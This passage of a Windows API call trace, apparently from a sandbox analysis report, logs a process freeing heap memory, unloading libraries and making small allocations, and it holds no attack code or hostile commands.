(hMem=0x46df10) returned 0x0 [0133.526] GetProcessHeap () returned 0x410000 [0133.526] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e930 | out: hHeap=0x410000) returned 1 [0133.526] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458ab8 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457320 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e900 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f130 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457340 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458ad8 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45de90 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a58 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e840 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a98 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e7f8 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457330 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e858 | out: hHeap=0x410000) returned 1 [0133.527] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e948 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e870 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449760 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e888 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4572f0 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e8b8 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e8a0 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e8d0 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457300 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e8e8 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457310 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e918 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e7e0 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e828 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e810 | out: hHeap=0x410000) returned 1 [0133.528] GetProcessHeap () returned 0x410000 [0133.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e7c8 | out: hHeap=0x410000) returned 1 [0136.974] GetProcessHeap () returned 0x410000 [0136.974] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44df80 | out: hHeap=0x410000) returned 1 [0136.974] FreeLibrary (hLibModule=0x15f0000) returned 1 [0136.974] FreeLibrary (hLibModule=0x74650000) returned 1 [0136.987] free (_Block=0x693f88) [0136.988] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0x4696b0 [0136.988] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4288e8 [0136.989] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x46dfd0 [0136.989] free (_Block=0x693f08) [0136.989] free (_Block=0x0) [0136.989] free (_Block=0x6913c0) [0136.989] free (_Block=0x693f20) [0136.989] free (_Block=0x693f68) [0136.989] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x44b590 [0136.990] free (_Block=0x692620) [0136.991] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x76f90000 [0136.991] FreeLibrary (hLibModule=0x76f90000) returned 1 [0136.991] GlobalHandle (pMem=0x429128) returned 0x510004 [0136.991] GlobalUnlock (hMem=0x510004) returned 0 [0136.997] FreeLibrary (hLibModule=0x71af0000) returned 1 [0136.998] FreeLibrary (hLibModule=0x71ad0000) returned 1 [0137.000] FreeLibrary (hLibModule=0x71a00000) returned 1 [0137.009] FreeLibrary (hLibModule=0x719a0000) returned 1 [0137.009] FreeLibrary (hLibModule=0x71970000) returned 1 [0137.010] FreeLibrary (hLibModule=0x71890000) returned 1 [0137.011] FreeLibrary (hLibModule=0x71860000) returned 1 [0137.012] FreeLibrary (hLibModule=0x71800000) returned 1 [0137.014] FreeLibrary (hLibModule=0x717a0000) returned 1 [0137.019] FreeLibrary (hLibModule=0x716e0000) returned 1 [0137.032] FreeLibrary (hLibModule=0x71450000) returned 1 [0137.033] FreeLibrary (hLibModule=0x71430000) returned 1 [0137.034] FreeLibrary (hLibModule=0x71210000) returned 1 [0137.828] FreeLibrary (hLibModule=0x71cb0000) returned 1 [0138.286] FreeLibrary (hLibModule=0x71c80000) returned 1 [0138.334] FreeLibrary (hLibModule=0x741b0000) returned 1 [0159.246] FreeLibrary (hLibModule=0x70b10000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d958 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427058 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427068 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427078 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427088 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427098 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4270a8 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4270b8 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4270c8 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4270d8 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4270e8 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4270f8 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427120 | out: hHeap=0x410000) returned 1 [0159.248] GetProcessHeap () returned 0x410000 [0159.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427130 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427140 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427150 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427160 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427170 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427180 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427190 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4271a0 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4271b0 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4271c0 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4271d0 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4271e0 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4271f0 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427200 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427210 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427220 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427230 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427240 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427250 | out: hHeap=0x410000) returned 1 [0159.249] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427260 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427270 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427280 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427290 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4272a0 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4272b0 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4272c0 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4272d0 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4272e0 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4272f0 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427300 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427310 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427320 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427330 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427340 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427350 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427360 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427370 | out: hHeap=0x410000) returned 1 [0159.250] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427380 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427390 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4273a0 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4273b0 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4273c0 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4273d0 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4273e0 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4273f0 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427400 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427410 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427420 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427430 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427440 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427450 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427460 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427470 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427480 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427490 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4274a0 | out: hHeap=0x410000) returned 1 [0159.251] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4274b0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4274c0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4274d0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4274e0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4274f0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427520 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427530 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427540 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427550 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427560 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427570 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427580 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427590 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4275a0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4275b0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4275c0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4275d0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4275e0 | out: hHeap=0x410000) returned 1 [0159.252] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4275f0 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427600 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427610 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427620 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427630 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427640 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427650 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427660 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427670 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427680 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427690 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4276a0 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4276b0 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4276c0 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4276d0 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4276e0 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4276f0 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427700 | out: hHeap=0x410000) returned 1 [0159.253] GetProcessHeap () returned 0x410000 [0159.253] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427710 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427720 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427730 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427740 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427750 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427760 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427770 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427780 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427790 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4277a0 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4277b0 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4277c0 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4277d0 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4277e0 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4277f0 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427800 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427810 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427820 | out: hHeap=0x410000) returned 1 [0159.254] GetProcessHeap () returned 0x410000 [0159.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427830 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427840 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427850 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427860 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427870 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427880 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427890 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: 